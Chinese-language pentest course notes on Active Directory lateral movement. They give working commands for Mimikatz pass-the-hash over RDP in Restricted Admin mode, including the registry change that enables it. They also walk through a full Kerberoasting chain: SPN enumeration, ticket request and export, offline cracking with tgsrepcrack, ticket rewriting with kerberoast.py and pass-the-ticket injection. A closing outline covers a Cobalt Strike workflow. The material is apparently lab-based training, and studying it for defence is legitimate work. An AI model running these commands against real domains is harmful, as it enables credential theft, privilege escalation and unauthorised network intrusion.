演示案例:
• 域橫向移動RDP傳遞-Mimikatz
• 域橫向移動SPN服務-探針,請求,導出,破解,重寫
• 域橫向移動測試流程一把梭哈-CobaltStrike初體驗
案例1-域橫向移動RDP傳遞-Mimikatz
除了上述講到的IPC,WMI,SMB等協議的鏈接外,獲取到的明文密碼或HASH密文也可以通過RDP協議進行鏈接操作。
RDP協議連接:判斷對方遠程桌面服務是否開啟(默認:3389),端口掃描判斷
RDP明文密碼鏈接
windows: mstsc
mstsc.exe /console /v:192.168.3.21 /admin
linux: rdesktop 192.168.3.21:3389
RDP密文HASH鏈接
windows Server需要開啟 Restricted Admin mode,在Windows 8.1和Windows Server 2012 R2中默認開啟,同時如果Win 7 和Windows Server 2008 R2安裝了2871997、2973351補丁也支持;開啟命令:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
開啟后運行:
mstsc.exe /restrictedadmin
mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"
案例2-域橫向移動SPN服務-探針,請求,破解,重寫
https://www.cnblogs.com/backlion/p/8082623.html
黑客可以使用有效的域用戶的身份驗證票證(TGT)去請求運行在服務器上的一個或多個目標服務的服務票證。DC在活動目錄中查找SPN,並使用與SPN關聯的服務帳戶加密票證,以便服務能夠驗證用戶是否可以訪問。請求的Kerberos服務票證的加密類型是RC4_HMAC_MD5,這意味着服務帳戶的NTLM密碼哈希用於加密服務票證。黑客將收到的TGS票據離線進行破解,即可得到目標服務帳號的HASH,這個稱之為Kerberoast攻擊。如果我們有一個為域用戶帳戶注冊的任意SPN,那么該用戶帳戶的明文密碼的NTLM哈希值就將用於創建服務票證。這就是Kerberoasting攻擊的關鍵。
探針
setspn -q /
setspn -q / | findstr "MSSQL"
請求
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"
mimikatz.exe "kerberos::ask /target:xxxx"
導出
mimikatz.exe "kerberos::list /export"
破解
python tgsrepcrack.py passwd.txt xxxx.kirbi
python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerry@MSSQLSvcSrv-DB-0day.0day.org1433-0DAY.ORG.kirbi
重寫
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
mimikatz.exe kerberos::ptt xxxx.kirbi # 將生成的票據注入內存
案例3-域橫向移動測試流程一把梭哈-CobaltStrike初體驗
大概流程:
啟動-配置-監聽-執行-上線-提權-信息收集(網絡,憑證,定位等)-滲透
1.關於啟動及配置講解
2.關於提權及插件加載
3.關於信息收集命令講解
4.關於視圖自動化功能講解